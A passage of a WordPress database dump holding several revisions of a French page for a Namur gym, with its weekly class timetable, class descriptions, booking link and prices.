href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png\"><img class=\"alignnone  wp-image-461\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png\" width=\"90\"/></a></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:41:10', '2014-12-15 19:41:10', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(464, 1, '2014-12-15 19:42:49', '2014-12-15 19:42:49', '', 'LesMills', '', 'inherit', 'open', 'open', '', 'lesmills-2', '', '', '2014-12-15 19:42:49', '2014-12-15 19:42:49', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png', 0, 'attachment', 'image/png', 0),
(465, 1, '2014-12-15 19:43:23', '2014-12-15 19:43:23', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\"><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"140\" height=\"30\" /></a></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:43:23', '2014-12-15 19:43:23', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(467, 1, '2014-12-15 19:44:38', '2014-12-15 19:44:38', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:44:38', '2014-12-15 19:44:38', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(482, 1, '2015-04-21 09:53:17', '2015-04-21 09:53:17', '<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\" /></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 09:53:17', '2015-04-21 09:53:17', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
